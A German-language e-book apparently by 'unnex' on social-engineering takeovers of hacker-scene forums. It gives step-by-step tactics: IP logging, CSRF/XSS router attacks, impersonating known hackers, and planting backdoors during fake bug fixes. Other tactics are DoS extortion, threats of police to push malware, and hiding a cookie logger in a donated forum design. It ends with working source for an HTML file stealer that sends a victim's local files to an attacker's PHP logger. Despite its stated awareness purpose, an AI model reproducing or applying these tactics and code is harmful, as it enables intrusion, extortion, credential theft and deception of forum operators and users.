###############################################
#####Taktiken zum Übernehmen von deutschen Scene-Boards#####
#################e-book by unnex###################
###############################################
Inhalt:
Vorwort
1. Grundwissen
1.1 Software
1.2 Teamanalyse
1.3 Usernamen & IP’s
1.4 Vertrauen, Fame, Ressourcen & Kontakte
2. Vorbereitung
2.1 IP’s besorgen
2.2 Bugs suchen
2.3 Faming
2.4 Board-Interessen
2.5 Kontakte knüpfen
3. Angriffs-Taktiken
3.1 der Helfer in der Not
3.1.1 Bug fixen
3.1.2 Botnet o. crashen
3.1.3 Maleware
3.1.4 Modding
3.2 biete & suche
3.2.1 tolles Tool
3.2.2 Tutorial als htmldatei
3.2.3 mein Nolog, loggt
3.3 meine Projekte
3.3.1 meine Crew
Vorwort:
Dieses E-Book beschreibt Methoden zum Cracken von Deutschen Hackerscene-Boards.
Es beschreibt Methoden und Vorgehensweisen sowie wichtige Informationen die das Hacken eines Scene-Boards möglich machen. Die hier beschreibenen Informationen und Angriffs-Taktitken sind von mir selbst des öfteren erfolgreich eingesetzt wurden. Dieses E-Book bezieht sich NUR auf Social-engineering Angriffe.
Wer dieses E-Book liest sollte sich darüber im klaren sein das es zur Aufklärung der Sicherheitsschwachstellen in deutschen Sceneboards dient. Und es dem zu folge eine Informationsquelle zur Behebung dieser Schwachstellen darstellt.
Es ist also kein Book of dead gegen die Scene. Es ist ein E-Book das den Admins lediglich Schwachstellen offenlegen soll damit sie diese dann beheben und beachten können. Alle hier beschrieben Angriffs-Taktiken beziehen sich auf Social engineering und sind somit sehr variierbar einsetzbar.
1. Grundwissen
In den nächsten Unterpunkten werden grundlegende Informationen über Scene-Boards und ihre Struktur sowie die Teammitglieder und deren Eigenschaften beschrieben.
1.1 Software
Wie der Name schon sagt bestehen “Scene-Boards” aus Forensoftware. Hierbei könnte man davon ausgehen das diese selber programmiert werden. Dem ist aber nicht so. Ich habe noch nie ein Scene-Board gesehen das selbst programmiert wurde, und werde wohl auch nie eins zu Gesicht bekommen. Folglich werden hier ausnahmslos, mehr oder weniger bekannte, schon existente Forensysteme, genutzt. zb im deutschen Sprachraum wird sehr oft auf: smf, vbulletin, wbb, phpbb und mybb zurrück gegriffen. In China ist derzeit “discuz” der Renner usw…
In diesem E-Book möchte ich mich aber auf die deutsche Scene beschränken. Nicht nur die Forensysteme selber sondern auch die dazugehörigen Mods und Addons werden nur in den aller seltensten fällen selbst oder teils selbst programmiert.
Demnach kann man also davon ausgehen das die Admins und Teammitglieder der Boards recht wenig Ahnung vom Source ihrer Forensoftware haben.
Zu erklären ist dieser Zustand mit mangelnden Programmierkenntnissen des deutschen Undergrounds.
Diese Tatsachen wirken jetzt auf den ersten Blick unwahrscheinlich. Sind aber das ganze Gegenteil und Bestandteil der Möglichkeiten zum hacken eines Scene-Boards.
Aber dazu später.
1.2 Teamanalyse
In den letzten Jahren hat der Anteil an Cardern in der Scene einen überdimensionalen Zuwachs bekommen. Was dazu geführt hat das wirkliche Hacker & Programmierer meist nur noch die Leute sind die schon zum alten Eisen gehören.
Das führt uns wiederum zu einer anderen Tatsache. Die scene besteht zum großteil aus Jugendlichen und halben Kindern. Somit ist es sehr unwahrscheinlich das ein Board von qualifizierten
und erfahrenen Administratoren geleitet wird. Mitwirkend bei dieser Tatsache ist auch das viele von den alten Hasen früher oder später aus der Scene aussteigen oder einfach White-hat’s werden.
Was nicht zuletzt am erschreckend niedrigen Durchschnittsalter und den dazugehörigen Verhaltensweisen der Scene’ler liegt.
Also, wenn man ein Scene-Board ownen will ist es wichtig vorerst das Team unter die Lupe zu nehmen. In den meisten Fällen wird man auf Jünglinge ohne Programmierer Kenntnisse stoßen.
Sollte dem nicht so sein dann ist es wichtig die einzelnen Personen und ihre Eigenschaften und Ränge im Team zu erkennen. Zb. Wer ist der Coder ? Wer der gfx’er ? Wer gehört alles zu den
normalen Mods. etc…
1.3 Usernamen & IP’s
Im Underground ist es schon fast zum Volksport geworden mehr als einen Username zu besitzen. Viele Scene-Mitglieder ändern also ständig oder speziell für verschiedene Projekte ihre Usernamen. Sollte man jetzt also den Username eines Admins kennen, so ist es wichtig diesen nicht als Dogma dessen Internet-Identität an zu sehen. Dinge wie icq-Nummern, E-Mailaddressen, Signaturen… können dabei helfen noch andere Usernamen der betroffenen Personen heraus zu finden. Hierbei ist an zu merken das ein Scene’ler niemals oder so gut wie nie, nur auf einem Board angemeldet ist.
Ein weiterer Volkssport ist das dauerhafte anonyme Surfen. d.h. viele nutzen vpn’s oder sock’s dauerhaft oder zumindest immer wenn sie auf ihrem Board unterwegs sind. Was uns als Angreifer natürlich nicht entgegen kommt. Deshalb ist es wichtig sich nie auf die IP-Adresse des Opfers zu verlassen. Selbst wenn diese als dynamiche IP ausgezeichnet ist. Denn auch hier ist es möglich das der jenige einen Privatrechner infiziert hat und dessen Anbindung nun als socks nutzt (VicSock). Man sollte also zum erspähen der IP des Opfers immer Methoden nutzen bei denen man sich möglichst sicher sein kann das man auch seine real IP bekommt.
1.4 Vertrauen, Fame, Ressourcen & Kontakte
Wie schon erwähnt ist der Großteil der Scene nicht sehr bewandert was das Hacken, insbesondere alte und weniger übliche Hackingmethoden betrifft. In vielen Fällen ist es also recht einfach diese Leute zu beeindrucken oder sie von deinem Können zu überzeugen.
Zb. Weist du was eine session fixation ist oder ein tpl-inject oder eine array function escalation ?
Ob du es nun weist oder nicht, ich kann dir versichern in der Scene wissen es nur die wenigsten bis überhaupt niemand. Solches wissen ist sehr wichtig für dich. Damit kannst du zeigen wie viel du weist und das du mehr weist als Anderen. Und dieses wissen kannst du zum festigen deiner Rolle als richtiger Hacker bestens verwenden.
—————————-
Der fame an sich ist natürlich auch eine gute Grundlage für einen erfolgreichen Angriff. Seltsamerweise wird fame oft mit vertrauen gedankt. Dein fame in der scene kann also
zu einem mächtigem Trumpf bei Angriffen auf scene-boards werden. Allerdings führt fame auch zu vielen Neidern die sich nicht selten zu richtigen hatern entwickeln.
Im Grunde ist das auch kein wunder wenn man das alter dieser “hater” und der scene allgemein betrachtet. Sollte man jetzt also versuchen den admin eines boards mittels
fame ein zu wickeln dann ist es einfach nur notwendig darauf zu achten das dieser admin kein hater des fames ist den du einsetzt.
Eine weitere nützliche Sache ist das Vorhandensein der richtigen Kontakte und Ressourcen. mit Kontakten und Ressourcen meine ich Kontakt zu den boardadmins und der scene selber
sowie den Besitzer einiger Server zum hosten oder socks zum usen. Ebenso etwas wissen im crashen von servern oder evtl. ein kleines botnet dein eigen nennen.
2. Vorbereitung
An diesem Punkt werde ich jegliche beschreiben wie man sich einige nützliche Informationen beschafft die für die verschiedenen Angriffstaktiken hilfreich oder sogar notwendig sind.
2.1 Ip’s besorgen
Wie schon gesagt nutzt die scene Forensysteme die sie einfach ziehen und Hochladen und nach belieben aufmodden.
Jeder der ein bisschen Erfahrung in sachen hacking hat kann sich jetzt ausmalen wie einfach ein Spionage angriff auf die ip eines users wäre. diese Forensysteme erlauben es Grafiken von entferneten Servern ein zu binden. Nutzt man jetzt also das prinzip des webbugs (zählpixel problematik) dann ist es ein Kinderspiel die ip des gegenüber zu ermitteln.
Wir laden eine Grafik auf einen unserer Server hoch und hängen sie uns im Forum als Signatur an, oder schicken sie im bbcode bei einer privaten nachricht mit.
Anschließend sehen wir dann bei uns in die serverlogs und suchen uns raus welche ip wann unsere Grafik aufgerufen hat.
Diese methode klappt auch bei vielen Messanger darunter auch icq 7. Alternativ zu dieser Methode kann man das Opfer auch dazu bringen es auf einen link klicken zu lassen um dann dort die ip per serverlogs oder zb php zu loggen. eine weitere möglichkeit wäre zb. ihm einen sock an zu bieten.
Wenn er dann versucht den sock zu usen können wir alles fein säuberlich mitloggen incl. ip.
Diese Methoden sind natürlich nicht die einzigen. wie sich jeder denken kann gibt es zig methoden um an die ip oder die proxy ip des Opfers zu gelangen. Nun ist es aber so das viele sceneuser dauerhaft hinter einem proxy oder ähnlichen sitzen.
Hierbei empfehlen sich Methoden bei denen man sich möglichst sicher sein kann die richtige ip zu bekommen. eine Möglichkeit wäre zb. ein angriff auf den Router des Opfers. natürlich kann man die meisten router nicht direkt übers internet angreifen. und über wlan auch nicht da man nicht weis wo er ist.
Ebenso kann das wlan des routers sehr gut verschlüsselt. Ein angriff übers Internet auf den Router des Opfers wirkt also geradezu absurd.
Doch gerade deswegen ist diese Angriffsart für uns interessant. Niemand würde erwarten das ein Angreifer aus dem Internet heraus und ohne den Opferrechner zu infizieren und ohne das der router aus dem Internet erreichbar ist, im stande ist den router an zu greifen.
Diese tatsache führt dazu das alle angriffe die von außen kommen mittlerweile recht gut zu verhindern sind. Allerdings wird dabei das Internet vernachlässigt. Viele user fühlen sich mit ihren macfiltern und wpa2 schluesseln so sicher das sie nicht daran denken ein ordentliches router passwort zu setzen. die meisten router haben also die standartlogin daten drinn und als authentifikation ausgewählt. wir können uns also per csrf in den router einloggen bzw. unser opfer macht das fuer uns unbewusst. dabei ist es natuerlich wichtig möglichst viele routerarten in unser script ein zu binden. also, loggt das opfer sich jetzt per csrf in den router so könnten wir über einen xss bug im Router alle infos die der Router hat beschaffen. so unglaublich wie es klingt. Aber sehr, sehr viele router-firmwares haben xss bugs, manche von denen sind sogar nutzbar egal ob jemand eingeloggt ist oder nicht. Ebenso kommt es auch oft vor das man im eingeloggten zustand den router per csrf oder bloßen link resetten kann u.ä.
2.2 Bugs suchen
Nein hiermit meine ich keine sqli’s oder rfi, tpli usw… wenn wir sowas finden würden bräuchten wir uns keine mühe mehr zu machen diesen text hier weiter zu lesen^^ ich meine Bugs bei denen man sein opfer mehr oder weniger mit einbeziehen muss. Also zb. xss, csrf, session fixation, clickjacking… allerdings beschreibe ich hier den Einsatz dieser bugs nicht im herkömmlichen sinne. wir nutzen die Bugs also nicht aus (in dem sinne wieso sie überhaupt Bugs sind). sondern wir nutzen sie als Mittel um unsere scheinbare Hilfsbereitschaft an zu bieten. Aber dazu mehr bei der Beschreibung der einzelnen Angriffstaktiken.
Das finden solcher Bugs ist bei den Forensystemen oftmals sehr einfach. Es existieren sogar sehr oft schon bug Reports von aktuellen Forensystemen die solche Bugs behandeln. zb ist mitte 2010 eine xss luecke beim eintragen einer Homepage im Profil gleich auf mehreren Forensystem vertreten gewesen. Darunter vbulletin, smf, phpbb. bei wbb3.0.x gab es ebenfalls eine xss Lücke im userprofil. Derzeit müsste wbb3.1.3 die neuste Version sein. auch diese enthält eine session fixation die man mit csrf koppeln kann. Für zb clickjacking sind derzeit so gut wie alle Forensysteme anfällig. Man merkt also das finden solcher bugs ist sehr wahrscheinlich und diese Wahrscheinlichkeit erhöht sich nicht selten kontinuierlich mit der Anzahl an mods die das board inne hat.
2.3 faming
Wie bereits erwähnt kann fame von großem nutzen sein um das vertrauen des boardadmins zu gewinnen. Haben wir ein paar news in bekannten IT-Zeitschriften oder Blogs oder ähnlichen Dingen Dann wird uns des öfteren sehr schnell Respekt und vertrauen entgegen gebracht. besonders in Verbindung mit punkt 2.2 ist dieses spezielle vertrauen hilfreich. denn hier bekommen wir einerseits vertrauen und andererseits technisches wissen zugeschrieben. Wenn wir jetzt also einem Admin einen bug reporten dann haben wir sehr hohe Chancen beim fixen des Bugs selber mitwirken zu können. Und dieses selbst mitwirken kann der Schlüssel zum Serverzugriff sein.
Ebenso vereinfacht es das unterjubeln von Schadsoftware oder schädlichen links. Mit dem Vorwand eine besonders gute exploitseite oder ein besonders gutes hackertool geben zu wollen, hätten wir hier recht gute Chancen.
Diesen fame kann man natürlich auch über “beeindruckende” taten auf dem board erwirken. zb wir schreiben ein paar sehr brauchbare tuts und stellen sie ins board oder verschenken einige brauchbare accounts usw… ebenso könnten wir uns auch ein paar Kontaktpersonen (die zum admin führen) zu nutzen machen um dem admin Ammenmärchen von unseren “superskills” zu unterbreiten.
2.4 Board-Interessen
Gezielt die Interessen des Boards aus zu nutzen ist ebenfalls eine brauchbare Taktik. Vorerst sollte man feststellen was dem Board fehlt. bzw was die User brauchen. zb
man läd einen Trojaner hoch getarnt als exploitsoftware in der Hoffnung der admin zieht ihn sich und infiziert sich damit. oder man merkt das der admin oder
teammitglieder socks brauchen.
Wenn sie diese brauchen fallen gleich zwei Aspekte ins Spektrum. erstens: man weiß nun das sie nicht anonyme im Board unterwegs sind und hat leichtes Spiel
bei punkt 2.1
Zweitens: man gibt ihnen einen socks den man selber verwaltet und loggt ihre userhandlungen mit. Dabei auch die des Einloggens in den Adminpanel des forums. In der scene weiß sowieso keiner wie unsicher die socks5 Verschlüsselung wirklich ist!
Oder man erfährt dass das Board ein neues Design brauch. man macht eins+spielereien mit javascript und hinterlässt in diesen ein paar xss bugs. Die uns bei 2.2 natürlich einen Freibrief schenken
würden.
Oder der Admin muss umhosten weil er den Server nicht mehr bezahlen kann. Wenn ihr ihn dazu bringt, ihn bei euch hosten zu lassen… es gibt also viele Interessent die vielseitig ausgenutzt werden können.
2.5 Kontakte knüpfen
Das beschaffen der richtigen Kontakte kann von großem nutzen sein um zb. seine Autorität oder Glaubwürdigkeit zu festigen. Hierbei ist es wichtig, über welchen weg auch immer, einen
Kontakt zum Admin zu bekommen. Würden wir zb. Kontakt zu einem Teammitglied bekommen dann könnten wir dieses nutzen um uns bei dem Admin einen Namen zu machen.
3. Angriffs-Taktiken
Alle bis jetzt genannten Dinge sind wichtig für diesen Punkt und dienen als Fundament für die nachfolgenden Angriffs-Taktiken.
3.1 der Helfer in der Not
Hierbei erzwingt man bewusst Situationen bei denen man den Admin seine Hilfe anbieten kann oder vom Admin darum gebeten wird.
3.1.1 Bug fixen
Bei dieser Methode ist es wichtig den richtigen fame und die richtigen bugs mit ein zu bringen.
Als erstes suchen wir uns den fame. Hierzu nehmen wir uns einen Hacker der in einigen scene News erwähnt wurde. Diese Identität nehmen wir nun an. Dabei sollten wir möglichst darauf achten das der admin des boards keinen Kontakt zu dieser fame-person hat und das diese Person keine Kontaktmöglichkeiten öffentlich im Netz bereit stellt.
Also möglichst jemand nehmen der nur mit Username in den news zu finden ist. nun stellen wir uns auf dem board mit unserer Identität vor und bringen in unseren Vorstellungsthread unsere newseinträge ein und hängen uns noch ein paar bemerkenswerte Programmierer Fähigkeiten an.
Dann warten wir erstmal ein bisschen ab und sehen wie die member auf unsere vorstellung reagieren. Rund einen tag warten und reinschauen. In den meisten fällen werden wir herzlichst begrüßt und werden sogleich mit anfänger fragen übers hacken und tutanfragen bombadiert. Diesen anfragen gehen wir so schnell wie möglich nach um unseren status als richtig guter hacker zu festigen.
Ist das getahen dann suchen wir einen bug auf dem forum. Also wie schon beschrieben in “2.2 bugs suchen”.
Diesen bug reporten wir dem admin oder coder des boards. Beim reporten ist es sehr wichtig viel fachchinesich mit ein zu bringen und den bug möglichst kompliziert darzustellen und ihm weitreichende auswirkungen zu zu schreiben. Ebenfalls ist es wichtig den bug so dar zu stellen das es aussieht wie als könnte man ihn nur schwer fixen. Anschließend warten wir die reaktion des gegenüber ab und sehen ob er weis was zu tuhen ist oder nicht. Wenn er es nicht weis bieten wir ihm prompt unsere hilfe an. Wenn er weis was zu tuhen ist. Müssen wir schnellstmöglich Gegenargument für seineIdeen einbringen. also zb wenn wir ihm einen xss bug reporten und er mein er wird einfach ” oder > ausdeclarieren dann antworten wir ihm das dies nicht ausreichend ist da man zb mit etwas glueck diese zeichen mit unbekannten zeichen die man davor stellt erzwingen kann.
Oder das die function die man zum ausdeclarieren nutzt ja wieder eine array function escalation möglich machen könnten usw. haben wir es geschafft dem admin weis zu machen dass das fixen des bugs nicht so einfach ist wie er denkt dann ist es an der zeit eure hilfe an zu bieten. Am besten ihr sagt noch das ihr das schon ein paar mal gemacht habt und wisst worauf ihr achten müsst. und das bestimmt recht schnell gehen wird den bug zu fixen.
Mun stellt sich die frage: in wie weit könnt ihr mitwirken beim fixen des bugs ? An dieser stelle möchte ich ein paar mögliche varianten beschreiben.
-er gewährt euch server zugriff damit ihr den bug fixen könnt. jetzt ist natuerlich klar was ihr macht. ihr fixed den bug und baut zugleich ein kleines backdoor in den source ein. achtet darauf das das backdoor möglichst tief im source versteckt ist und aus zb. rund 2-3 zeile besteht und variablen namen möglichst angepasst an andere variablen im source sind. -ihr bekommt die betroffene sourcedatei geschickt und sollt sie ihm gefixed geben damit er sie selber hochladen kann. wieder fixt ihr den bug baut ein backdoor ein.
-er gibt euch remote zugriff auf seinen rechner und will zusehen wie ihr den code fixt. das kann ein gewagtes manöver werden aber es ist durchaus machbar. ihr nehmt euch einen code zum fixen der möglichst lang ist. am besten so lang das niemand lust hätte diesen nochmal zu untersuchen. diesen kopiert ihr im dann in seine phpdatei. in euren fix code habt ihr natuerlich wiederum ein kleines backdoor eingebaut. es kann auch nicht schaden den code ueber die ganze datei auf zu teilen und das fixen bei dem der admin zusieht sehr schnell von statten gehen zu lassen. so das der admin schon beim sehen sichtlich uebefordert wird.
sollte der seltene fall auftreten und euer opfer fixed den bug selber dann ist es wichtig einen neuen zu finden. bzw die von euch genannten gegenargumente auf seinen fix wirken zu lassen. in den meisten fällen klappt das auch und ihr könnt ihm beweisen das er den bug nicht selber fixen kann. in diesem fall habt ich dann höchstwahrscheinlich eine der drei so eben genannten varianten zur auswahl. habt ihr es dann geschafft dem source euren abckdoor unter zu jubeln, dann muesst ihr nur noch warten bis keiner mehr vom team auf dem board online ist. also möglich mitten in der nacht. dann könnt ihr in aller ruhe euer backdoor nutzen und den server uebernehmen.
3.1.2 botnet o. crashen
Bei dieser Methode sind wir vor allem auf unsere ressourcen angewiesen. es geht zwar auch ohne, und wie es ohne geht, beschreibe ich auch. aber man wird merken, die methode ohne ressourcen ist wahrscheinlich weniger erfolgreich. vorerst wie es ohne ressourcen geht:
Wir melden uns wieder auf dem Betroffenen forum an und stellen uns vor. dabei merken wir an das wir ueber ein sehr gutes wissen und sehr viel erfahrung im absichern von servern gegen ddos und ähnliche angriffe haben. wenn uns die ersten member “hallo” gesagt haben und wir halbwegs zur kenntniss genommen wurden, kanns auch schon los gehen. wir suchen uns einen bug in der serversoftware
und bringen den server zum absturz. also einen dos bug oder memory corruption usw… gelingt uns das, also das wir einen bug finden, dann legen wir das board vortan jedesmal lahm wenn teammember oder der admin selber online ist. es wird nur wenige tage oder vllt. auch nur stunden dauern bis den boardbetreibern dieser zustand gehörig auf die nerven geht. folglich werden sie versuchen etwas gegen das problem vor zu gehen. jetzt gibt es mehrere möglichkeit. behebt das team tatsächlich diese bugs dann ist schicht im schacht fuer diese methode. sollten sie es nicht beheben können dann sind sie logischerweise auf hilfe angewiesen. wenn du glueck hast kommen die admins aufgrund deines vorstellungsthreads selbst auf dich. sollte dem nicht so sein, dann ist jetzt schnelles handeln gefragt. wir kontaktieren den admin und teilen ihm unser bedauern ueber den zustand des boards mit und schlagen ihm vor den server zu sichern. unseren vorstellungsthread erwähnen wir dabei auch um ein bisschen glaubwuerdigkeit mit ins spiel zu bringen. der admin wird uns vorerst kein vertrauen schenken. also crashen wir weiter seinen server. diesesmal aber nonstop sobald wir die antwort vom admin erhalten haben in der zum ausdruck kommt das er unsere hilfe nicht annimmt. wenn wir der meinung sind das wir ihm genug auf den zeiger gegangen sind dann schreiben wir ihn wieder an und bieten ihm eine sofortlösung an. also wir bieten ihm ein server script an das ein backdoor enthält. um den admin weiter ein zu wickeln merken wir an das wir doch so gerne auf diesem board unterwegs sind und alles mögliche machen möchten um es wieder online zu bekommen. des weiteren bitten wir ihn darum es doch wenigstens mal fuer kurze zeit zu probieren. und wenn es nicht klappt kann er es ja wieder runter hauen. mit etwas glueck nimmt er diesesmal unser angebot an. nun muessen wir nur noch eine kurze zeit warten zb. eine stunde, und dann stoppen wir unseren angriff auf das board. was nun passiert ist klar. wir schreiben den admin an und belatschern ihn permanent, wie toll es doch ist dass das script funktioniert. diese aktion soll uns zeit verschaffen bzw den admin mit uns beschäftigen damit wir zeitgleich unseren backdoor ausnutzen können bevor der admin das script evtl. wieder löscht. sollte der admin diesen vorschlag nicht annehmen und unser script nicht nutzen wollen dann geben wir ihm einen tip der an die servereinstellungen gebunden ist. also zb logs ausschlaten, mit der aberwitzigen begruendung das man den prozess des loggens damit unterbindet und somit das script weniger zu tuhen hat und weniger schnell ueberastet werden kann usw… frueher oder später wird er so etwas ausprobieren, was wir ihm vorschlagen. wenn das geschieht dann stoppen wir unsere crash angriffe und vernehmen die danksagung des admins, das unser tip geholfen hat. nun warten wir eine ganze weile zb. eine woche. dann greifen wir wieder an. und wieder bieten wir unsere hilfe an. diesesmal aber mit der begruendung das bei diesem angriff mehr gemacht werden muss. wir haben dem admin schon einmal geholfen. diesesmal wird er unser serverscript wohl eher annehmen. und wenn er das macht dann haben wir es, wie schon gesagt, geschafft und können den server uebernehmen.
nun zur vorgehensweise mit ressourcen. natuerlich kann es vorkommen das man den betroffenen server nicht so einfach crashn oder dosen kann. in diesem fall muessen wir mit unverhinderbaren mitteln rann. also zb. ein richtig großes botnet. wir legen das board erstmal fuer ein paar tage oder stunden lahm. dann schreiben wir den admin an und fragen ob er nicht einen besseren server haben will. einen den wir sponsern wuerden. im grunde ist es meist nur eine frage der zeit. also wir ddosn so lange bis der admin auf unser angebot eingeht. sollte er auf einen anderen server wechseln der nicht zu uns gehört, dann ddosn wir auch diesen server. also, wenn es soweit ist und er unseren vorschlag annimmt dann muessen wir nichts weiter machen als zu warten bis er treudoof seine backups und daten auf unseren server hochläd, wo wir sie dann in aller ruhe einsehen können. wichtig bei dieser methode ist natuerlich das wir bei unserer vorstellung im forum betonen das wir im besitz verdammt guter server sind.
3.1.3 maleware
Diese methode erfordert besonders viel geschick weil es hier von nöten ist mehrere rollen zu spielen die sehr gut aufeinander abgestimmt sein muessen. des weiteren ist diese methode recht langwierig. zu erst legen wir uns ein paar accounts auf seinem board an. dann besorgen wir uns die ip des admins. danach forschen wir ein bisschen nach. wir brauchen ein paar usernamen oder andere internet-addressen auf denen der admin angemeldet ist. wenn wir möglichst viel informationen ueber diese person haben dann schreiben wir ihn an. das machen wir aufbrausend und leicht gereizt. also wir schreiben ihn in etwa so an: du: na, xxx AKA xxxx und AKA xxxxx. ich hab deine ip 000.00.00.0! und die werden die bullen bekommen (wichtig dabei ist das wir auch wirklich seine real ip haben.) der admin wird versuchen sich nichts anmerken zu lassen, und macht einen auf dicke hose und das es ihn angeblich nicht interessiert. an dieser stelle verdeutlichen wir ihm das er angeblich einen trojaner von uns auf seinem system hat. das machen wir indem wir seine ip ddosn. wir warten nun bis er wieder online ist. wenn er wieder da ist erzählen wir ihm folgendes:
du: na soll ich nochma machen ? scan mal dein sys du noob. aber egal, in rund 8 tagen kommen die cops nachdem wir das gesagt haben verschwinden wir einfach ohne weitere worte.
jetzt lassen wir dem admin ein paar tage zeit. nach 1-2 tagen schreiben wir ihn von unseren board accounts an. und erzählen ihm das wir gehackt wurden. jeder account sollte dabei einzeln
richtig am rummheulen sein das er von den bullen hochgenommen wurde. dabei muss mindestens ein account genutzt werden um dem admin eine info zu entreißen die wir schon wissen. wir muessen ihn dazu bringen das er uns sagt das er von dem angreifer angeschrieben wurde. nun sollte dem admin langsam bange werden und er kommt ins gruebeln. wir warten wieder einen tag.
dann nehmen wir uns einen unserer foren accounts und schreiben ins forum das alle aufpassen sollen und nachsehen sollen ob sie infected sind. mit den anderen accs schreiben wir rein
das wir infected sind. wir warten wieder einen tag. dann schreiben wir den admin an und erzählen ihm das wir den trojaner auf unserem system gefunden haben und eine software haben mit der man ihn aufspuehren kann. wenn wir bis jetzt gut gearbeitet haben und dem admin genug angst gemacht haben wird er unsere malewareannehmen und wir haben ihn trojanert.
3.1.4 modding
hier ist es wichtig die richtigen interessen des boards zu erfahren. ich auf nur eine möglichekit eingehen. also, sollte das board ein neues design brauchen: wir melden uns auf dem board an und prahlen mit unseren tollen designer skills. mit in den vorstellungsthread bringen wir ein paar 0815 designs ein. die allerdings fuer ein anderes forensystem sind. dann schreiben wir den admin an und schlagen ihm vor ein design, ein richtig gutes design fuer sein board zu machen. er wird diesen vorschlag nicht ablehnen. weil ein design ja eigentlich nicht schaden kann und er schlussendlich immernoch nein sagen kann. nebenbei machen wir uns weitere foren accounts und erzählen von diesen aus, das uns das alte design nicht gefällt. nun ist es an der zeit unsere rolle als helfer einen sinn zu geben. wir fragen den admin ob es möglich wäre das wir nachdem neuen design zum gfxer oder ähnlichen ernannt werden. der admin wird dieses ganze geschehen wahrscheinlich nur als probesache aufnehmen. wir basteln jetzt also das design. und erklären das wir uns sehr viel muehe gegeben haben und sogar javascript fenster und handlungen fuer tolle effekte mit reingebracht haben. (dem sollte auch wirklich so sein!) und jetzt kommt der ausschlag gebende punkt. der admin wird nicht darauf achten das javascript gefährlicher sein kann als man denkt. wir geben ihm also screens aus dem localmode wo wir das design am laufen haben und ueberreden ihn es auf seinem board zu nutzen. was der admin dabei uebersieht, ist die gefahr die von unserem javascript code ausgeht. denn in diesen code basteln wir einen cookielogger ein. am besten versteckt als iframe. also, location.href+cookie und das in nen iframe und verstecken. das sollte reichen. wenn der admin jetzt dieses design aufs forum knallt werden die cookies der user permanent auf einen unserer server eubertragen. so unglaublich wie es klingt. aber nur die wenigstens bis ueberhaupt niemand sieht sich 100kb js dateien die einzeilig sind an, und findet xss backdoors. diese methode ist also unter umständen eine sehr efektive wahl.
3.2 biete & suche
diese methoden beziehen sich auf das öffentliche einbringen von tools und ähnlichen dingen ins board. also, wir bieten im forum kostenlos tools und tuts an.
3.2.1 tolles tool
zu dieser methode brauch ich wohl nicht viel zu sagen. weil sie ohnehin abgedrochen und nur noch selten mit erfolg gekrönt ist. wir brauchen ein paar foren accounts und fud maleware. diese maleware bieten wir im forum kostenlos an und erklären mit den anderen accounts wie toll dieses programm doch funzt und wie hilfreich es ist. wenn wir glueck haben dann wird auch der admin versuchen unsere maleware zu nutzen. und somit hätten wir ihn als victim in unserer trojanerliste.
3.2.2 tutorial als htmldatei
bei deiser methode nutzen wir wieder die unwissenheit des admins aus. zu erst erstellen wir einen forenaccount und posten ein paar normalen .txt tutorials. wenn wir genug davon gepostet haben und wir sehen das diese auch gelsen werden dann können wir ein tutorial reinstellen das nur als .html datei verfuegbar ist. bei dieser art von datei wird niemand verdacht schöpfen. besonders
nicht die deutschen scene’ler XD vorweg brauchen wir allerdings eine wichtig inforamtion: wo speichert das opfer die serverdaten ? diese beschaffen wir uns folgendermaßen: wir bringen den admin dazu mit uns eine remote-desktop session ein zu gehen. also zb mikogo, teamviewer, vnc… etc. gruende dafuer gibt es viele. wir könnten uns zb die handhabung eines bestimmten programms zeigen lassen oder einfach begeistert fragen ob wir bei einem hack zusehen duerfen usw. haben wir einen grund gefunden und sind verbunden mit unserem victim dann prägen wir uns jede datei die wir sehen ganz genau ein. die meisten leute haben dateien wie “serverdats.txt” oder ähnliches auf dem desktop. also, wir achten auf jede datei! wenn wir eine datei sehen die, die serverdaten enthalten könnte dann haben wir vorerst genug informationen. also zb wir sehen die datei “root.txt” auf dem desktop. als unser opfer auf “start” gedrueckt hat in der taskleiste, haben wir den username gesehen, der zb bei windows in diesem programmfenster verzeichnet ist. also: server.txt auf dem desktop und username ist “ichuser” der pfad zu datei wäre dann zb: C:\Dokumente und Einstellungen\ichuser\Desktop\root.txt web:
file:///C:/Dokumente%20und%20Einstellungen/ichuser/Desktop/root.txt
jedenfalls sofern der user auf c used. wenn nicht muessten wir das aber auch spitz kriegen in unserer desktop session. nun können wir unser tutorial erstellen. zwischen viel und damit meine
ich wirklich richtig viel text verstecken wir einen file stealer. ich denke mal sogut wie niemand hat bis jetzt von html file stealen gehört. also nehme ich einen code den ich selber mal verfasst hatte.
im grunde könnte es sogar sein das diese idee von mir stammt XD weis aber nich ob schonmal jemand drauf gekommen is XD
[php] —
—html file stealer by unnex—
#########sender.html#########
<html><head>
<title>html stealer</title>
<script type=”text/javascript”>
var first = “yes”;
function uebernahme(dat) {
if(browsertyp == “IE” && first == “no” && dat!=undefined) {
document.x.textausgabe.value+=”\n”;
location.href=”http://[server]/annahme.php?log=”+escape(document.x.textausgabe.value);
}
if(dat!=undefined){
document.x.textausgabe.value+=dat;
location.href=”http://[server]/annahme.php?log=”+escape(document.x.textausgabe.value);
first=”no”;
}
}
function read(file) {
var source = “”;
if(browsertyp != “IE”) {
var url = new java.net.URL(new java.net.URL(window.location.href), file);
var stream = new java.io.DataInputStream(url.openStream());
var line = “”;
while ((line = stream.readLine()) != null) {
if(first==”yes”) {
source += line;
first=”no”;
} else {
source += “\n” + line;
}
}
stream.close();
} else {
source = dwn.startDownload(file,uebernahme);
}
return source;
}
</script>
</head>
<body bgcolor=”white” text=”black” link=”blue” vlink=”purple” alink=”red”>
<script type=”text/javascript”>
var browsertyp;
if(!navigator.language || document.defaultCharset) {
browsertyp=’IE’;
document.write(‘none download’);
} else {
browsertyp=’MO’;
}
</script>
<form name=”x” action=”javascript:uebernahme(read(document.x.textfile.value))”>
<p><input type=”text” name=”textfile” value=”file:///[local-file]” size=”20″>
<input type=”submit” name=”run” value=”Datei einlesen”></p>
<p><textarea name=”textausgabe” rows=”5″ cols=”15″></textarea></p>
</form><script>document.forms[0].submit()</script>
</body>
</html>
#########annahme.php#########
<?php
if (isset($_GET["log"])) { echo $_GET["log"];
if (file_exists(“[logfile]“)) {
$filename=”[logfile]“;
$fp = fopen($filename,’a‘);
fwrite($fp, “\r\n\r\n#########next file##########\r\n\r\n” . $_GET["log"]);
fclose($fp); } else { $filename=”[logfile]“;
$fp = fopen($filename,’w‘);
fwrite($fp, “$_GET["log"]);
fclose($fp); } }
header(‘Location: [weiterleitung]‘);
?>
#########help.txt#########
###html file stealer – by unnex###
hilfe:
zu bearbeiten:
#sender.html
[server]=eigenen server angeben zb: www.meinserver.de
[local-file]=locale zu klauende datei angeben zb: C:/geheim.txt
line 9: location.href=”http://[server]/save.php?log=”+escape(document.x.textausgabe.value);
